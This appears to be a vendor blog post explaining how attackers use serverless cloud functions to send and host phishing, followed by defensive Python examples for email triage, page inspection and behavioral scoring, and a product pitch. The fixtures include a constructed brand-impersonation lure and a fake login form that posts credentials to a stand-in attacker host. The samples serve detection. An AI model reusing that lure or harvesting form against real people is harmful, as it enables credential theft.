Key Insights
Serverless functions give attackers a direct path to host and deliver phishing content through trusted cloud infrastructure. Because the messages are sent through the provider's own mail service, they pass SPF, DKIM, and DMARC for the provider's domain, and the URLs they carry sit on provider subdomains that businesses already trust. That combination makes serverless-hosted phishing harder to detect with traditional email security controls, increasing the risk of credential theft and extending the time security teams spend triaging incidents that existing tools miss.
How Serverless Functions Enable Phishing on Trusted Infrastructure
Serverless functions let attackers blend phishing delivery and hosting into normal cloud activity. Four properties make this model effective:
- Trusted Sending Paths: Cloud workflows send messages through legitimate provider infrastructure, so SPF, DKIM, and DMARC pass for the provider's sending domain. Those checks vouch for that domain, not for the brand named in the display name or the action the message requests. Emails mimic file-sharing prompts, service notifications, or voicemail alerts that employees already see.
- Trusted URL Hosting: Phishing pages sit on cloud-provider subdomains that businesses rely on for normal operations, making broad blocking impractical. A phishing page inherits platform reputation even when created minutes earlier.
- Dynamic Content Delivery: Serverless code tailors responses based on visitor, timing, or request context. Sandboxes receive harmless content while intended victims see login prompts, and attackers swap content after delivery without changing the visible link.
- Short-Lived Infrastructure: Functions spin up and disappear before reputation systems score them. Pages vanish before analysts complete review, and limited reuse reduces the value of static blocklists.
These properties explain why serverless-hosted phishing looks technically legitimate while driving credential theft. Authentication alone does not address this risk, and domain-level trust says little about a single page created for a phishing campaign. Defenders need page-level context and post-delivery visibility to make reliable decisions.
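The following is an added example, not code from the article or from any vendor product, showing the distinction the section draws: SPF, DKIM, and DMARC vouch only for the domain in the headers, so triage has to ask separately whether that domain is the brand the message claims to be and whether the link lands on a host any tenant can publish under. The two sample messages, the provider domain, the shared-hosting suffix, and the brand-to-domain table are all constructed for this example.

```python
"""
Added example (not from the article): triage a delivered message by separating
"authentication passed" from "the authenticated domain is the brand the message
claims to be from". Both sample messages, the provider domains and the brand
table are constructed for this example.
"""
import re
from email import message_from_string
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed: a file-share lure sent through a cloud provider's mail service and
# linking to a function the attacker published minutes earlier.
LURE = """\
Authentication-Results: mx.example.test;
 spf=pass smtp.mailfrom=bounce.cloudprovider.example;
 dkim=pass header.d=cloudprovider.example;
 dmarc=pass header.from=cloudprovider.example
From: "Contoso SharePoint" <notify@cloudprovider.example>
To: finance@example.test
Subject: Contoso shared "Q3 Invoice Approval.pdf" with you
Content-Type: text/plain

Contoso shared a document with you. Open it here:
https://func-7q2x.functions.cloudprovider.example/review/Q3-Invoice-Approval
"""

# Constructed: a genuine notification from the same provider, for contrast.
BENIGN = """\
Authentication-Results: mx.example.test;
 spf=pass smtp.mailfrom=bounce.cloudprovider.example;
 dkim=pass header.d=cloudprovider.example;
 dmarc=pass header.from=cloudprovider.example
From: "Cloud Provider Billing" <billing@cloudprovider.example>
To: finance@example.test
Subject: Your May statement is available
Content-Type: text/plain

View the statement in the console:
https://console.cloudprovider.example/billing/statements
"""

# Constructed: suffixes under which any tenant can publish functions or pages.
SHARED_HOSTING_SUFFIXES = ("functions.cloudprovider.example",)
# Constructed: brands the lure imitates, mapped to the domains they really send from.
BRAND_DOMAINS = {
    "contoso": ("contoso.com",),
    "sharepoint": ("sharepoint.com", "microsoft.com"),
}


def parse_auth_results(header):
    """Return {method: {'result', 'domain'}} for spf/dkim/dmarc from an
    Authentication-Results header (folded continuation lines are fine)."""
    results = {}
    for method in ("spf", "dkim", "dmarc"):
        m = re.search(
            rf"{method}=(\w+)[^;]*?(?:smtp\.mailfrom|header\.d|header\.from)=([\w.-]+)",
            header,
        )
        if m:
            results[method] = {"result": m.group(1), "domain": m.group(2).lower()}
    return results


def under(host, suffixes):
    """True if host equals or is a subdomain of any suffix."""
    return any(host == s or host.endswith("." + s) for s in suffixes)


def triage(raw):
    """Decide whether a message needs page-level review even though it authenticates."""
    msg = message_from_string(raw)
    auth = parse_auth_results(msg.get("Authentication-Results", ""))
    display_name, address = parseaddr(msg.get("From", ""))
    from_domain = address.rsplit("@", 1)[-1].lower()
    links = re.findall(r"https?://[^\s<>\"]+", msg.get_payload())

    authenticated = len(auth) == 3 and all(v["result"] == "pass" for v in auth.values())
    findings = []
    if not authenticated:
        findings.append("authentication missing or failed")

    # SPF/DKIM/DMARC vouch for from_domain only. If the display name or subject
    # names a brand, that brand's real domain must be the authenticated one.
    claimed = f"{display_name} {msg.get('Subject', '')}".lower()
    for brand, domains in BRAND_DOMAINS.items():
        if brand in claimed and not under(from_domain, domains):
            findings.append(f"claims {brand!r} but authenticated sender domain is {from_domain}")

    # A link on shared cloud hosting inherits the provider's reputation; only the
    # page itself can be judged, so send it for page-level review.
    for link in links:
        host = urlparse(link).netloc.lower()
        if under(host, SHARED_HOSTING_SUFFIXES):
            findings.append(f"link on tenant-publishable cloud host {host}")

    return {
        "authenticated": authenticated,
        "findings": findings,
        "verdict": "page-level review" if findings else "pass",
    }


if __name__ == "__main__":
    for name, raw in (("lure", LURE), ("benign", BENIGN)):
        print(name, triage(raw))
```

Both messages authenticate identically; only the brand-alignment check and the tenant-publishable link separate the lure from the genuine notification, which is the gap the rest of this page is about.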
Real Campaigns Show Serverless Email Threats Are Active
Cloud-hosted phishing and serverless execution already appear in active attack chains. CISA's advisory on Scattered Spider documents the group's use of phishing, credential theft, and abuse of cloud environments, including tactics consistent with provider-managed infrastructure and valid-account misuse.
The advisory highlights three patterns:
- Trusted Services Matter: Attackers do not need obviously malicious infrastructure when valid accounts and cloud services support delivery and hosting.
- Short Campaigns Work: Temporary hosted pages collect credentials before blocklists or reports catch up.
- Cross-Layer Analysis Strengthens Detection: Identity, cloud entitlements, email analysis, and user reporting all contribute to detection and response.
Organizations investigating serverless phishing incidents need to ask whether the sender, link destination, and requested action make sense together, beyond checking whether the infrastructure appears legitimate.
Why Serverless Phishing Challenges Email Security
Serverless phishing weakens broad reputation signals and compresses the time defenders have to assess intent. These limitations directly affect detection rates, analyst workload, and mean time to respond:
- Reputation Is Broad: Provider reputation reflects the platform overall, not the individual page or function the attacker created. This gap produces false negatives that reach employee inboxes.
- Inspection Is Momentary: A safe-looking response during scanning changes after delivery once the backend logic updates. Analysts spend cycles investigating links that no longer match the original threat.
- Context Is Limited: Message metadata alone does not indicate whether the requested action fits the normal relationship between sender and recipient, resulting in alerts that lack the context needed for confident triage.
Secure email gateways (SEGs) evaluate sender domains, IPs, and embedded links against reputation data, and that approach still works for many commodity campaigns. The challenge is that a trusted cloud domain hosts both legitimate business applications and serverless phishing pages created moments earlier, making reputation-based checks alone less effective for this attack type.
Analysts gain more value from evaluating message intent: Does the request match the sender's normal workflow? Does the recipient usually handle this type of approval, login, or document? Does the message create urgency that feels out of pattern? Serverless phishing slips past controls that prioritize technical legitimacy over business context.
Post-delivery visibility also matters. Attackers serve benign content during pre-delivery scanning and update the serverless function logic later. User reports arrive after the phishing page has changed or disappeared, and HTML patterns and hashes lose value quickly. Post-delivery review and retrospective controls address these gaps.
Defensive Strategies for Serverless-Based Email Threats
The most effective defenses against serverless phishing reduce attacker opportunity across identity, cloud administration, and link access. These measures target different stages of the attack flow and work best together:
- Hardening Authentication: CISA's FIDO MFA implementation report recommends phishing-resistant methods, such as FIDO2, to protect access to sensitive systems. Phishing-resistant MFA breaks the attack path after the click, even when the URL sits on a legitimate cloud domain: a FIDO2 authenticator binds the credential to the origin it was registered on, so a page on a different host cannot complete the login, which directly reduces the risk of credential compromise from serverless-hosted campaigns.
- Restricting Deployment Permissions: Cloud entitlements determine whether a compromised account can serve as a phishing platform. Periodic reviews, just-in-time access, and approval controls around workflow automation reduce that risk while producing audit-ready records of who can create and modify serverless resources.
- Improving URL Analysis: CISA's phishing defense guidance recommends layered defenses, including URL evaluation. Inspection logic focused on redirect chains, credential prompts, and form actions identifies suspicious use of legitimate cloud domains without generating noise from normal business applications.
- Enabling Protective DNS: CISA recommends protective DNS (PDNS) to block resolution of known malicious domains, which also catches downstream domains in redirect chains. Its role is secondary when the parent cloud domain is widely trusted and cannot be blocked outright, but it adds value as a layer within a broader control set.
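The following is an added example, not code from the article or from any product, implementing the URL-analysis bullet above and the post-delivery point made earlier on this page: a link on a tenant-publishable cloud host is inspected at the page level (credential prompts, form actions, redirect hops) once at delivery time and again at click time, so a page that served benign content to the scanner and a login form to the victim is caught by the difference. The page URL, both HTML snapshots, the redirect chain, and the brand word list are constructed; nothing is fetched from the network, and the two-label `same_site` comparison is a simplification that a real implementation would replace with the public suffix list.

```python
"""
Added example (not from the article): page-level inspection of a link that lands on
a tenant-publishable cloud host, run once at delivery and again at click time so a
benign-at-scan page that later turns into a login form is caught. The page URL,
both HTML snapshots, the redirect chain and the brand list are constructed; nothing
is fetched from the network.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

PAGE_URL = "https://func-7q2x.functions.cloudprovider.example/review"  # constructed
BRAND_WORDS = ("sharepoint", "microsoft", "office 365")  # constructed

# Constructed: what the function returned while the gateway scanned the link.
DELIVERY_HTML = """<html><head><title>Preparing document</title></head>
<body><p>Your document is being prepared. Please wait.</p></body></html>"""

# Constructed: what the same URL returned to the victim after the backend was updated.
CLICKTIME_HTML = """<html><head><title>Sign in to SharePoint</title></head>
<body><form method="post" action="https://collect.attacker-relay.example/submit">
<input type="email" name="user"><input type="password" name="pass">
<button>Sign in</button></form></body></html>"""
# Constructed: hops the browser passed through before reaching PAGE_URL at click time.
CLICKTIME_CHAIN = ["https://track.attacker-relay.example/r?id=7q2x"]


class FormScanner(HTMLParser):
    """Collect form actions, password inputs and the page title."""

    def __init__(self):
        super().__init__()
        self.forms, self.password_inputs, self.title = [], 0, ""
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # valueless attributes become ""
        if tag == "form":
            self.forms.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "title":
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def same_site(host_a, host_b):
    """Compare the last two DNS labels. Simplification for the example; a real
    implementation should use the public suffix list."""
    return host_a.lower().split(".")[-2:] == host_b.lower().split(".")[-2:]


def inspect_page(page_url, html, redirect_chain):
    """Score one snapshot. redirect_chain lists the URLs visited before page_url."""
    host = urlparse(page_url).netloc
    scanner = FormScanner()
    scanner.feed(html)
    reasons = []
    if scanner.password_inputs:
        reasons.append("password prompt on tenant-publishable host")
    for action in scanner.forms:  # credentials posted somewhere other than the page's own site
        action_host = urlparse(action).netloc
        if action_host and not same_site(action_host, host):
            reasons.append(f"form posts off-site to {action_host}")
    for hop in redirect_chain:  # chain left the trusted domain on the way in
        hop_host = urlparse(hop).netloc
        if not same_site(hop_host, host):
            reasons.append(f"redirect through {hop_host}")
    if any(b in scanner.title.lower() for b in BRAND_WORDS):
        reasons.append(f"brand name in title ({scanner.title.strip()!r}) on provider subdomain")
    verdict = "block" if len(reasons) >= 2 else "review" if reasons else "allow"
    return {"host": host, "reasons": reasons, "verdict": verdict}


def compare_snapshots(page_url, delivery, clicktime):
    """delivery and clicktime are (html, redirect_chain) pairs captured at the two
    moments. Returns both verdicts and the reasons that appeared only after delivery."""
    before = inspect_page(page_url, *delivery)
    after = inspect_page(page_url, *clicktime)
    return {
        "delivery_verdict": before["verdict"],
        "clicktime_verdict": after["verdict"],
        "new_reasons": [r for r in after["reasons"] if r not in before["reasons"]],
        "content_changed": delivery[0] != clicktime[0],
    }


if __name__ == "__main__":
    print(compare_snapshots(PAGE_URL, (DELIVERY_HTML, []), (CLICKTIME_HTML, CLICKTIME_CHAIN)))
```

The delivery-time snapshot scores "allow" and the click-time snapshot scores "block" for the same URL; retaining the first snapshot is what makes the second one actionable, because the diff, not either verdict alone, shows the backend changed after the scan.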
Detecting Serverless Email Threats With Behavioral Context
Behavioral context identifies serverless email threats when infrastructure signals look legitimate. The strongest detection question is simple: does this email fit the sender's normal pattern and the recipient's expected workflow?
High-value signals guide analyst decisions:
- Workflow Mismatch: The message asks for an action outside the sender's normal business process.
- Recipient Mismatch: The request targets someone who does not handle that document, approval, or login path.
- Timing Mismatch: The email creates urgency or arrives outside the normal communication cadence for that sender relationship.
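The following is an added example, not code from the article or from any product, that turns the three signals above into a scoring routine: it builds a per-sender profile from a message history (who the sender writes to, what they ask for, and at what hours) and scores a new message for workflow, recipient, and timing mismatch, with urgency language folded into the timing signal. The baseline history, both incoming messages, the action labels, and the urgency phrase list are constructed for this example.

```python
"""
Added example (not from the article): score a message against the sender's observed
relationship with the organization, emitting workflow, recipient and timing mismatch
signals. The baseline, both incoming messages and the urgency phrase list are
constructed for this example.
"""
from collections import defaultdict
from datetime import datetime

# Constructed baseline: a vendor's billing contact sends invoices to AP during working hours.
BASELINE = [
    {"sender": "billing@vendor.example", "recipient": "ap@example.test", "action": "invoice", "ts": "2024-04-08T09:15"},
    {"sender": "billing@vendor.example", "recipient": "ap@example.test", "action": "invoice", "ts": "2024-04-22T10:40"},
    {"sender": "billing@vendor.example", "recipient": "ap@example.test", "action": "invoice", "ts": "2024-05-06T14:05"},
    {"sender": "billing@vendor.example", "recipient": "ap-lead@example.test", "action": "statement", "ts": "2024-05-31T16:30"},
]
URGENCY_PHRASES = ("immediately", "urgent", "within the hour", "final notice", "before end of day")  # constructed

# Constructed: the message under review, sent from the vendor's (compromised or spoofed) address.
SUSPECT = {
    "sender": "billing@vendor.example", "recipient": "finance-intern@example.test",
    "action": "bank_detail_change", "ts": "2024-06-14T02:40",
    "subject": "URGENT: updated remittance details",
    "body": "Please update our bank account immediately so the next payment run is not delayed.",
}
# Constructed: a routine invoice that should score low.
ROUTINE = {
    "sender": "billing@vendor.example", "recipient": "ap@example.test",
    "action": "invoice", "ts": "2024-06-10T10:30",
    "subject": "Invoice 1043", "body": "Invoice 1043 for May services is attached.",
}


def build_profile(history):
    """Summarize, per sender, who they write to, what they ask for, and when."""
    profile = defaultdict(lambda: {"recipients": set(), "actions": set(), "pairs": set(), "hours": []})
    for m in history:
        p = profile[m["sender"]]
        p["recipients"].add(m["recipient"])
        p["actions"].add(m["action"])
        p["pairs"].add((m["recipient"], m["action"]))
        p["hours"].append(datetime.fromisoformat(m["ts"]).hour)
    return profile


def score_message(msg, profile):
    """Return the mismatch signals for msg and a triage priority."""
    p = profile.get(msg["sender"])  # .get() does not create a default entry
    if p is None:
        return {"signals": ["no history for sender"], "priority": "medium"}
    signals = []
    known_action = msg["action"] in p["actions"]
    if not known_action:
        signals.append(f"workflow mismatch: sender has never requested {msg['action']!r}")
    if msg["recipient"] not in p["recipients"]:
        signals.append(f"recipient mismatch: sender has never written to {msg['recipient']}")
    elif known_action and (msg["recipient"], msg["action"]) not in p["pairs"]:
        signals.append(f"recipient mismatch: {msg['recipient']} does not handle {msg['action']!r} from this sender")
    hour = datetime.fromisoformat(msg["ts"]).hour
    lo, hi = min(p["hours"]), max(p["hours"])
    if not lo <= hour <= hi:
        signals.append(f"timing mismatch: sent at {hour:02d}:00, sender normally writes between {lo:02d}:00 and {hi:02d}:00")
    text = f"{msg['subject']} {msg['body']}".lower()
    hits = [u for u in URGENCY_PHRASES if u in text]
    if hits:
        signals.append(f"timing mismatch: urgency language {hits}")
    priority = "high" if len(signals) >= 3 else "medium" if signals else "low"
    return {"signals": signals, "priority": priority}


if __name__ == "__main__":
    profile = build_profile(BASELINE)
    for m in (SUSPECT, ROUTINE):
        print(m["subject"], "->", score_message(m, profile))
```

The routine invoice produces no signals; the bank-detail request fires all three mismatches plus urgency language and is prioritized without any reference to sending infrastructure, which is the point when that infrastructure is a trusted cloud domain.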
Where signature-based detection often struggles with serverless phishing because content and indicators change rapidly, behavioral analysis evaluates the relationship and context behind each message, making it more resilient to dynamic attack infrastructure. For security teams, that translates to fewer false negatives on cloud-hosted threats and more accurate alert prioritization, reducing the time analysts spend on inconclusive triage.
This is where behavioral AI for email enhances the effectiveness of existing email security. Abnormal applies behavioral AI to cloud email and related account signals, helping security teams surface suspicious messages based on communication patterns, workflow cadence, recipient behavior, and message intent.
That additional layer fills a gap that reputation and signature-based tools often leave open, catching serverless phishing attacks that bypass existing defenses while reducing false positives through richer behavioral context. Abnormal integrates with existing email infrastructure to enhance native defenses and secure email gateways (SEGs), deploying without architectural changes, strengthening detection coverage, and minimizing additional operational burden.
How to Strengthen Defenses Against Serverless Phishing
Serverless phishing raises the value of identity hardening, cloud governance, and behavior-based email analysis. A practical response includes three priorities:
- Tighten Cloud Administration: Limit who can publish serverless functions, workflows, and hosted pages.
- Improve Click-Time Analysis: Review cloud-hosted links for redirect behavior, credential prompts, and page-level risk.
- Add Behavioral Context: Evaluate whether the message fits normal business activity even when the infrastructure appears legitimate.
When those controls work together, organizations reduce exposure without over-relying on any single signal. Recognized as a Leader in the Gartner® Magic Quadrant™, Abnormal enhances existing email defenses to detect advanced threats that traditional controls often miss.
Book a demo to see how Abnormal detects cloud-hosted email threats that evade traditional defenses.
